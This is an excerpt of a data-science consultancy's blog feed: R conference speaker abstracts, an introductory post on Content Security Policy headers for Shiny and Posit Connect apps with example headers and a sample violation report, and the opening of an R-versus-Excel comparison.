&lt;h4 id="julia-silge---posit"&gt;Julia Silge - &lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;Julia Silge is a data scientist and software engineer at Posit PBC (formerly RStudio) where she works on open source modeling and MLOps tools. She is an author, an international keynote speaker, and a real-world practitioner focusing on data analysis and machine learning. Julia loves text analysis, making beautiful charts, and communicating about technical topics with diverse audiences.&lt;/p&gt;
&lt;h4 id="oliver-hawkins---financial-times"&gt;Oliver Hawkins - &lt;a href="https://www.ft.com/" rel="external"&gt;Financial Times&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;Oliver Hawkins works as an editorial data scientist for the visual and data journalism team at the Financial Times. He has previously worked as a statistical researcher and a data scientist for the House of Commons Library, and as a data journalist for the BBC. He is interested in statistics, machine learning and data visualisation.&lt;/p&gt;
&lt;h3 id="contributed-talks"&gt;Contributed talks&lt;/h3&gt;
&lt;h4 id="botan-ağın-and-michael-stevens---samknows"&gt;&lt;a href="https://www.linkedin.com/in/botanagin" rel="external"&gt;Botan Ağın&lt;/a&gt; and &lt;a href="https://www.linkedin.com/in/michael-stevens-55a523b0/" rel="external"&gt;Michael Stevens&lt;/a&gt; - &lt;a href="https://samknows.com/" rel="external"&gt;SamKnows&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;AutRmatic reporting: billions of internet measurements, hundreds of reports and one repository to rule them all&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;SamKnows has been pioneering internet performance measurements for over 14 years. The reason we exist is to provide a source of truth for how the internet is really performing. The data we collect can be used as a common language between government regulators, internet service providers, academics, and content providers to optimise and improve internet performance for everyone.&lt;/p&gt;
&lt;p&gt;Day to day SamKnows uses R to handle a huge range of automated and self-serve workloads. Keeping track of each report’s recipients, delivery schedule, dependencies and deployment procedure can be tricky, especially in the nightmare scenario of suddenly needing to migrate all of your jobs to a new server or cloud environment.&lt;/p&gt;
&lt;p&gt;In this presentation, we will talk about how we structure our regularly-scheduled reports as standardised entities within a monorepo. We will explain how this approach reduces the latency in setting up a report, makes it easier for new team members to contribute, and lets us uphold standards while retaining the flexibility to deliver work in diverse formats with a range of complexity levels and opportunities for manual intervention. We will go into detail on specific workflows that take the terabytes of data collected by SamKnows from cloud and on-premises data sources, process them into an R Markdown document, formatted spreadsheet, and raw CSV output, and distribute them through cloud file storage, FTP servers, email, Slack and more.&lt;/p&gt;
&lt;h4 id="vyara-apostolova-and-laura-cole---national-audit-office"&gt;&lt;a href="https://www.linkedin.com/in/vyara-apostolova-5a62a4136/" rel="external"&gt;Vyara Apostolova&lt;/a&gt; and &lt;a href="https://www.linkedin.com/in/laura-cole-7b7397123/" rel="external"&gt;Laura Cole&lt;/a&gt; - &lt;a href="https://www.nao.org.uk/" rel="external"&gt;National Audit Office&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;ScRutinising government spending&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&amp;ldquo;The National Audit Office supports Parliament in holding government to account both via its Financial Audit and Value for Money work. The Analysis Hub is a central team that utilises a range of analytical techniques to support both strands of work. The proposed presentation will showcase two examples of how we in the Analysis Hub use R to support our mission to hold government to account.&lt;/p&gt;
&lt;p&gt;We use R to reproduce complex models that departments employ to produce accounting estimates for their financial accounts. Our R reproductions allow us to assess if departments have implemented their selected methodology correctly and to highlight any model integrity issues. We also implement additional sensitivity testing, including via Monte Carlo simulations to capture the uncertainty around model outputs. The presentation will cover an overview of our approach and a demo of a reproduction of a dummy model.&lt;/p&gt;
&lt;p&gt;We have also built a R-shiny app, Covid-19 Cost tracker, that brings together data from across the UK government on the costs of measures in response to the Covid-19 pandemic. It is one of the very few sources of comprehensive information on Covid-19 related spending and the only one as an interactive tool. With it the public can examine spending by department and category of spend as well as interact with bubble graphs to explore the costs of individual policies. The presentation will include an overview of how the data analytics team and audit team collaborated to produce the output and a demo of the app.&amp;rdquo;&lt;/p&gt;
&lt;h4 id="andrew-collier---fathom-data"&gt;&lt;a href="https://www.linkedin.com/in/datawookie/" rel="external"&gt;Andrew Collier&lt;/a&gt; - &lt;a href="https://www.fathomdata.dev/" rel="external"&gt;Fathom Data&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Dark Corners of the Tidyverse&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&amp;ldquo;In the realm of the Tidyverse, there are functions which are always in the spotlight. These are the titans: well known and loved, frequently invoked and virtually indispensable. There are other, lesser-known functions which stand quietly in the shadows. Unacknowledged, somewhat obscure and almost forgotten. Waiting for their moment to shine.&lt;/p&gt;
&lt;p&gt;I&amp;rsquo;ll talk about five of these Unsung Heroes of the Tidyverse, lauding their virtues and showing how they can help you succeed on your next Data Science quest.&amp;rdquo;&lt;/p&gt;
&lt;h4 id="jack-davison---ricardo-energy--environment"&gt;&lt;a href="https://www.linkedin.com/in/jack-davison/" rel="external"&gt;Jack Davison&lt;/a&gt; - &lt;a href="https://www.ricardo.com/en/services/environmental-consulting" rel="external"&gt;Ricardo Energy &amp;amp; Environment&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;“Put it on a map!” – Developments in Air Quality Data Analysis&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&amp;ldquo;An understanding of air quality is crucial as it can have significant public health, environmental and economic effects. However, air quality data is complex, constantly changing in space and time, and influenced by a myriad of factors such as meteorology and human activity. This makes air quality analysis challenging, and communicating the results of this analysis more challenging still!&lt;/p&gt;
&lt;p&gt;Just over a decade ago, the {openair} package was authored to provide an open-source toolkit to help air quality practitioners get the most out of their data, and is still used widely in academia, consultancy and industry today. While {openair} itself has not changed hugely in recent years, much thought has been put into extending it through leveraging more recent tools and packages.&lt;/p&gt;
&lt;p&gt;In this talk I will discuss how we have recently married {leaflet} and {openair} to create effective, interactive air quality maps. In particular, I’ll discuss the development of the {openairmaps} package – a toolset which makes it easy to create interactive “directional analysis” maps to help explore the geospatial context of pollution monitoring data.&amp;rdquo;&lt;/p&gt;
&lt;h4 id="russ-hyde---jumping-rivers"&gt;&lt;a href="https://github.com/russHyde" rel="external"&gt;Russ Hyde&lt;/a&gt; - &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Does code quality even matter in data science?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&amp;ldquo;It depends! &lt;br&gt;
If you need to quickly summarise some data for an ad-hoc request, then knock out the code in whatever manner gets the job done.&lt;/p&gt;
&lt;p&gt;But what happens when you start getting a lot of similar requests, or you are working on a more substantial project, or you are collaborating within a larger team? Now, productivity should be viewed &amp;lsquo;across the team&amp;rsquo; and &amp;lsquo;across all projects&amp;rsquo;. What can you do to help yourself and your colleagues, and what tools exist to help?&lt;/p&gt;
&lt;p&gt;Code quality concerns those aspects of software that make it easier to work with, easier to explain to others and easier to maintain or extend.&lt;/p&gt;
&lt;p&gt;In this talk, I&amp;rsquo;ll take you through the source code for an evolving analysis project. We&amp;rsquo;ll discuss how to (and how not to) modularise code. Along the way, we&amp;rsquo;ll talk about actions and calculations, body-tweaking, duplicate stomping and a few tools that help automate the boring low-level stuff that teams sometimes disagree about.&amp;rdquo;&lt;/p&gt;
&lt;h4 id="ella-kaye-and-heather-turner---university-of-warwick"&gt;&lt;a href="https://www.linkedin.com/in/EllaKaye/" rel="external"&gt;Ella Kaye&lt;/a&gt; and &lt;a href="https://www.linkedin.com/in/heathrturnr/" rel="external"&gt;Heather Turner&lt;/a&gt; - &lt;a href="https://warwick.ac.uk/" rel="external"&gt;University of Warwick&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Sustainability and EDI (Equality, Diversity and Inclusion) in the R Project&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The R Project is over 20 years old, but its future is not secure - many of the R Core Team are nearing retirement and there are not enough new contributors to sustain the work. We present a number of initiatives, organised under Heather Turner&amp;rsquo;s &amp;lsquo;Sustainability and EDI (Equality, Diversity and Inclusion) in the R Project&amp;rsquo; fellowship, to encourage and train a new, more diverse, generation of contributors. These include R contributor office hours, collaboration campfires, bug BBQs, translatathons and an updated R development guide. This presentation is also a call to action to encourage others to get involved in supporting this language, a fundamental piece of software in many disciplines, used by an estimated 2 million people.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-speakers/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Content Security Policy - Why You Need It</title><link>https://www.jumpingrivers.com/blog/content-security-policy-shiny-posit-connect/</link><pubDate>Thu, 02 Mar 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/content-security-policy-shiny-posit-connect/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/content-security-policy-shiny-posit-connect/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/content-security-policy-shiny-posit-connect/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is the first in a series of blog posts about server headers&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/content-security-policy-shiny-posit-connect/"&gt;Content Security
Policies&lt;/a&gt; - this
one&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/network-error-logging-shiny-posit-connect/"&gt;Network Error
Logging&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Heads up! We’re about to launch WASP, a Web Application Security
Platform. The aim of WASP is to help you manage (well, you guessed it)
the security of your Posit Connect application using Content Security
Policy and Network Error Logging. More details soon, but if this
interests you, please get in
&lt;a href="https://www.jumpingrivers.com/contact" rel="external"&gt;touch&lt;/a&gt;.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;This blog post is aimed at those who are &lt;em&gt;somewhat&lt;/em&gt; tech literate but
not necessarily a security expert. We’re aiming to introduce the concept
of Content Security Policy and teach some of the technical aspects.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;In 2018, a hacking group called
&lt;a href="https://es.wikipedia.org/wiki/Magecart" rel="external"&gt;Magecart&lt;/a&gt; exploited a
vulnerability on the British Airways website that allowed them to inject
JavaScript. The JavaScript code was used to send customer data to a
malicious server, succeeding in skimming the credit cards of 380,000
transactions before the breach was discovered. This type of attack comes
under the umbrella of cross-site scripting (XSS) - where malicious code
(often client-side JavaScript) is injected into the browser.&lt;/p&gt;
&lt;h2 id="what-is-content-security-policy"&gt;What is Content Security Policy?&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://content-security-policy.com/" rel="external"&gt;Content Security Policy&lt;/a&gt; (CSP) is
a framework of modern (ish) browsers, that allows a developer to protect
an application through the use of the &lt;code&gt;Content-Security-Policy&lt;/code&gt; HTTP
header. It’s used to give applications an extra layer of security -
safeguarding against attacks such as cross-site scripting. In this blog
we’re going to take you through some of the basics of Content Security
Policy and show you why it’s a necessity for modern applications.&lt;/p&gt;
&lt;h2 id="how-will-content-security-policy-help-me"&gt;How will Content Security Policy help me?&lt;/h2&gt;
&lt;p&gt;In one way or another, you have made it to this blog post on
&lt;a href="https://www.jumpingrivers.com" rel="external"&gt;jumpingrivers.com&lt;/a&gt;. This means your
browser has already loaded a tonne of assets that this page needs to
look and act in the way it does (JavaScript, fonts, stylesheets).
Without CSP, the browser will trust and not question any loaded
resources from any source. If there are any vulnerabilities with this
page, an attacker could run client-side JavaScript to import content
hosted from their own source; for instance, a fake form or a malicious
click event to skim user details or steal data from a database, just
like with British Airways. Your browser simply says “Yes, why wouldn’t I
trust this code?”. This is where CSP comes into play.&lt;/p&gt;
&lt;h2 id="how-does-csp-link-to-r"&gt;How does CSP link to R?&lt;/h2&gt;
&lt;p&gt;Have you ever used the {shiny}, {quarto} or {rmarkdown} R packages to
make web applications or documents? If you then took the extra step to
deploy your app, you should be asking the question “How safe is it to
deploy this?”. {shiny}, {quarto} and {rmarkdown} pull in a lot of
external resources; css, JavaScript etc. This leaves them vulnerable to
cross-site scripting attacks, just like British Airways. Using CSP, we
can protect our {shiny} / {rmarkdown} documents against these attacks.&lt;/p&gt;
&lt;h2 id="the-technical-basics"&gt;The technical basics&lt;/h2&gt;
&lt;p&gt;A Content Security Policy HTTP header is set on the server side, but
protects the client side. A CSP header is split into directives - each
directive enabling you to specify an allow list (in some cases, a deny
list) of valid sources for content that the browser can (or is not
allowed to) load. For instance, one of the more common directives,
&lt;code&gt;script-src&lt;/code&gt;, allows us to specify valid sources for scripts. Any
scripts that are from a source not listed within this directive will be
blocked from executing in the browser. A basic CSP header using
&lt;code&gt;script-src&lt;/code&gt; might be&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Content&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;Security&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;Policy&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; script&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;src &lt;span style="color:#a5d6ff"&gt;&amp;#39;self&amp;#39;&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;`
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The metasource, &lt;code&gt;self&lt;/code&gt;, is telling the browser to allow scripts to be
loaded from our domain. As there are no others sourced listed with it,
we are telling the browser to &lt;em&gt;&lt;strong&gt;only&lt;/strong&gt;&lt;/em&gt; allow scripts to be loaded from
our domain. There are other metasources:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;'self'&lt;/code&gt;: Content from the same domain,&lt;/li&gt;
&lt;li&gt;&lt;code&gt;'none'&lt;/code&gt;: Nobody can include this functionality. In the case above,
this would mean we accept scripts from no sources.&lt;/li&gt;
&lt;li&gt;A &lt;a href="https://en.wikipedia.org/wiki/Cryptographic_nonce" rel="external"&gt;nonce&lt;/a&gt; / hash:
Accept code with a specific nonce / hash.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Of course, we can also specify specific URL / domains. For instance,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Content&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;Security&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;Policy&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; script&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;src &lt;span style="color:#a5d6ff"&gt;&amp;#39;self&amp;#39;&lt;/span&gt; https&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;//posit.co/
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;would allow loading of scripts from our own domain, and Posit. Other
common directives include&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;default-src&lt;/code&gt;: Default values for &lt;code&gt;*-src&lt;/code&gt; directives.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;font-src&lt;/code&gt;: Valid sources for fonts loaded using the &lt;code&gt;@font-face&lt;/code&gt; CSS
at-rule.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;frame-src&lt;/code&gt;: Valid sources for embedded frame contents.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;img-src&lt;/code&gt;: Valid origins from which images can be loaded.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;navigate-to&lt;/code&gt;: Restricted URLs from which a document can initiate
navigation.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;style-src&lt;/code&gt;: Valid sources for stylesheets.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;media-src&lt;/code&gt;: Valid sources for loading media using &lt;audio&gt;, &lt;video&gt;
and &lt;track&gt; elements.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For a full list, see the &lt;a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy" rel="external"&gt;MDN Web
Doc&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="reporting-content-security-policy-violations"&gt;Reporting Content-Security-Policy violations&lt;/h2&gt;
&lt;p&gt;If an attacker had found any vulnerabilities on our site, then using the
directives above we would be blocking a good bunch of potential attacks
for users on modern browsers. However, users on browsers (mainly
Internet Explorer) that still do not support the CSP directives you’ve
chosen are still at threat. It’s important that we understand which CSP
directives are being targeted on our site, to protect the vulnerable on
old browsers.&lt;/p&gt;
&lt;p&gt;Directives are split into two categories; blockers and reporters.
Blockers block input into the application (think &lt;code&gt;script-src&lt;/code&gt;) and
reporters deliver reports about the blocks. This allows us to understand
which of our CSP directives are being targeted.&lt;/p&gt;
&lt;p&gt;The most important reporting directive is &lt;code&gt;report-to&lt;/code&gt;. However, it’s
predecessor, &lt;code&gt;report-uri&lt;/code&gt;, still plays a crucial role. In fact, all
browsers will fall back to &lt;code&gt;report-uri&lt;/code&gt; if it can’t find &lt;code&gt;report-to&lt;/code&gt;.
We’ll go into more detail on the differences between the two in a later
blog, but for now we’ll look into &lt;code&gt;report-uri&lt;/code&gt; (it’s a tad simpler).&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;report-uri&lt;/code&gt; directive allows us specify the URL(s) to which our CSP
violation should be reported. These URLs are usually API endpoints,
which process the report JSON. The following HTTP header would POST any
violations to the &lt;code&gt;csp-reporting&lt;/code&gt; endpoint on our domain&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Content&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;Security&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;Policy&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; script&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;src &lt;span style="color:#a5d6ff"&gt;&amp;#39;self&amp;#39;&lt;/span&gt;; report&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;uri &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;csp&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;reporting
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Any reports sent to this endpoint will be
&lt;code&gt;Content-Type: application/reports+json&lt;/code&gt; and contain four important
pieces of information (plus some others):&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;code&gt;blocked-uri&lt;/code&gt;: URI of the blocked resource&lt;/li&gt;
&lt;li&gt;&lt;code&gt;document-uri&lt;/code&gt;: URI of the document in which the violation occurred&lt;/li&gt;
&lt;li&gt;&lt;code&gt;original-policy&lt;/code&gt;: The original Content Security Policy&lt;/li&gt;
&lt;li&gt;&lt;code&gt;violated-directive&lt;/code&gt;: The CSP directive that was violated&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The format will look something like&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;csp-report&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;document-uri&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://magecart.com/example.html&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;referrer&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;blocked-uri&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://badwebsite.com/css/style.css&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;violated-directive&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;script-src &amp;#39;self&amp;#39;&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;original-policy&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; script&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;src &lt;span style="color:#a5d6ff"&gt;&amp;#39;self&amp;#39;&lt;/span&gt;; report&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;uri &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;csp&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;reporting&lt;span style="color:#a5d6ff"&gt;&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; &amp;#34;&lt;/span&gt;disposition&lt;span style="color:#a5d6ff"&gt;&amp;#34;: &amp;#34;&lt;/span&gt;report&lt;span style="color:#f85149"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This report indicates that on the page &lt;code&gt;magecart.com/example.html&lt;/code&gt;,
something has tried to load the style file located at
&lt;code&gt;badwebsite.com/css/style.css&lt;/code&gt;. However, because we have the
&lt;code&gt;script-src&lt;/code&gt; directive set to &lt;code&gt;&amp;quot;self&amp;quot;&lt;/code&gt;, only scripts from our own domain
may be sourced.&lt;/p&gt;
&lt;h2 id="some-limitations"&gt;Some limitations&lt;/h2&gt;
&lt;p&gt;Whilst CSP is a great addition to the security toolbox, there are some
“limitations”:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;It’s not a magic wand. It’s a control to cut down on your
application’s exposure - it will not patch vulnerabilities. Think of
it like a firewall - it’s a secondary control, a defence technique.
Mostly in case the developers have missed something. If you’re
having trouble with any security issues, feel free to get in
&lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;touch&lt;/a&gt; with us for advice.&lt;/li&gt;
&lt;li&gt;It’s only useful for client-side attacks on your application. It
does not help with server-side, database attacks or anything in
between.&lt;/li&gt;
&lt;li&gt;OK, this last one isn’t really a limitation, more of a warning. It’s
not on by default. The &lt;code&gt;Content-Security-Policy&lt;/code&gt; HTTP header has to
be added manually with each policy individually specified.&lt;/li&gt;
&lt;/ol&gt;
&lt;hr&gt;
&lt;p&gt;If Content Security Policy or Shiny app security in general interests
you or you want more news on WASP, our new Web Application Security
Platform, then please email &lt;a href="mailto:hello@jumpingrivers.com" rel="external"&gt;hello@jumpingrivers.com&lt;/a&gt; and we can discuss
how to set this up for your applications.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/content-security-policy-shiny-posit-connect/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Why should I use R: The Excel R Data Wrangling comparison: Part 1</title><link>https://www.jumpingrivers.com/blog/comparing-r-excel-data-wrangling/</link><pubDate>Thu, 23 Feb 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/comparing-r-excel-data-wrangling/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/comparing-r-excel-data-wrangling/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/comparing-r-excel-data-wrangling/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part 1 of an ongoing series on why you should use R. Future
blogs will be linked here as they are released.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: Why should I use R: The Excel R Data Wrangling comparison:
Part 1 (This post)&lt;/li&gt;
&lt;li&gt;Part 2: &lt;a href="https://www.jumpingrivers.com/blog/why-create-plots-in-r-part-2/" rel="external"&gt;Why should I use R: The Excel R plotting comparison: Part
2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 3: &lt;a href="https://www.jumpingrivers.com/blog/date-r-excel-datetimes-transition/" rel="external"&gt;Why should I use R: Handling Dates in R and Excel: Part
3&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The era of data manipulation and analysis using programming languages
has arrived. But it can be tough to find the time and the right
resources to fully switch over from more manual, time-consuming
solutions, such as Excel. In this blog we will show a comparison between
Excel and R to get you started!&lt;/p&gt;
&lt;p&gt;When choosing between R and Excel, it is important to understand how
both solutions can get you the results you need. However, one can make
it an easy, reputable, convenient process, whereas the other can make it
an extremely frustrating, time-consuming process prone to human errors.&lt;/p&gt;
&lt;h3 id="r-and-excel"&gt;R and Excel&lt;/h3&gt;
&lt;p&gt;When opening Excel and applying data manipulation techniques to your
data, are you easily able to tell what manipulations have been made
without clicking on the column or cells? If you were to share these
Excel sheets with colleagues are they easily able to replicate your
analyses without you telling them where to click or which formulas were
applied?&lt;/p&gt;
&lt;p&gt;With R all of these are possible. You automatically have all the code
visible and in front of you in the form of scripts. Reading and
understanding the code is possible because of its easy-to-use,
easy-to-read syntax which allows you to track what the code is doing
without having to be concerned about any hidden functions or
modifications happening in the background.&lt;/p&gt;
&lt;p&gt;Most people already learned the basics of Microsoft Excel in school.
Once the data has been imported into an Excel sheet, using a
point-and-click technique we can easily create basic graphs and charts.
R, on the other hand, is a programming language with a steeper learning
curve. It will take at most two weeks to become familiar with the basics
of the language and the RStudio user interface. Luckily using R can
easily become second-nature with practice.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-comparing-r-excel-data-wrangling"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="replicating-analysis"&gt;Replicating Analysis&lt;/h3&gt;
&lt;p&gt;R, while having a slightly steep learning curve, has the ability to
reproduce analyses repeatedly and with different data sets. This is very
helpful for large projects containing multiple data sets as it keeps our
processes clean and consistent. Excel however, because of the
point-and-click interface, allows us to rely frequently on memory and
repetition, so we would have to repeat the same analyses multiple times
by either copying and pasting or simply repeating the point-and-click
process, which can be time-consuming, messy, and prone to human errors.&lt;/p&gt;
&lt;p&gt;Unlike Excel, R is completely free and benefits from a large community
of open-source contributors. To install R and the IDE (RStudio Desktop)
to work with R, &lt;a href="https://posit.co/download/rstudio-desktop/" rel="external"&gt;download and
install&lt;/a&gt; the relevant
versions for your operating system. Once you have successfully installed
the IDE, the following user interface will be visible&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/comparing-r-excel-data-wrangling/graphics/posit_IDE.png" alt="The Posit IDE." style="width: 700px; display: block; margin-left: auto; margin-right: auto; class:image-cente"/&gt;
&lt;p&gt;The area on the left is where you will write R code in scripts, use
terminals and run jobs. The right hand side of the IDE is comprised of
two sections. The top is the environment that stores a list of defined
variables and data sets, view the history, and connect to other
database. The area below contains five different tabs: the &lt;strong&gt;Files&lt;/strong&gt; tab
which lists all of the folders within this project, the &lt;strong&gt;Plots&lt;/strong&gt; tab,
which displays any plots that have been generated; the &lt;strong&gt;Packages&lt;/strong&gt; tab
which allows you to manage packages within your environment; the
&lt;strong&gt;Help&lt;/strong&gt; tab which provides a manual; and the &lt;strong&gt;Viewer&lt;/strong&gt; tab which
allows you to view generated interactive content.&lt;/p&gt;
